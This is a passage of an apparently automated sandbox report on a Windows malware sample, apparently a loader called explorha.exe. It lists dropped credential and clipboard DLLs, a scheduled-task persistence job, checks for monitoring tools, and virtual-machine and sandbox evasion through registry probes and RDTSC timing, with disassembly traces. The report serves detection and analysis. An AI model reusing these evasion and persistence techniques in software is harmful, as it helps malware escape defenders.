                                Source: explorha.exe.0.drStatic PE information: section name: entropy: 7.982348024472177
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file

                                Boot Survival

                                barindex
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile created: C:\Windows\Tasks\explorha.jobJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-10389
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-10522
                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: E7EFE1 second address: E7EFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: E7EFEE second address: E7EFF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF24F9 second address: FF2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF2501 second address: FF2506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE0424 second address: FE042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE042E second address: FE0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE0434 second address: FE043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF1707 second address: FF1711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F449CC63D76h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF19FD second address: FF1A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF1CD3 second address: FF1CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF1CE8 second address: FF1CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF42E3 second address: FF435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D5Bh], ebx 0x0000000f push 00000000h 0x00000011 add esi, 7F8E79C4h 0x00000017 call 00007F449CC63D79h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D88h 0x00000022 pop eax 0x00000023 push eax 0x00000024 jmp 00007F449CC63D84h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jl 00007F449CC63D7Eh 0x00000033 jns 00007F449CC63D78h 0x00000039 push eax 0x0000003a pop eax 0x0000003b mov eax, dword ptr [eax] 0x0000003d pushad 0x0000003e ja 00007F449CC63D81h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF435C second address: FF4360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF4360 second address: FF43F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ecx 0x00000010 jmp 00007F449CC63D84h 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D3B9Ch] 0x0000001d push 00000003h 0x0000001f jo 00007F449CC63D7Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F449CC63D78h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3BE8h] 0x00000047 push 00000003h 0x00000049 call 00007F449CC63D79h 0x0000004e push eax 0x0000004f push eax 0x00000050 jnc 00007F449CC63D76h 0x00000056 pop eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 jmp 00007F449CC63D83h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF43F4 second address: FF43F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF43F8 second address: FF43FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF43FE second address: FF4404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF44BE second address: FF4500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F449CC63D78h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 xor dword ptr [ebp+122D1DCEh], edx 0x0000002a pop ecx 0x0000002b push 984C87ACh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
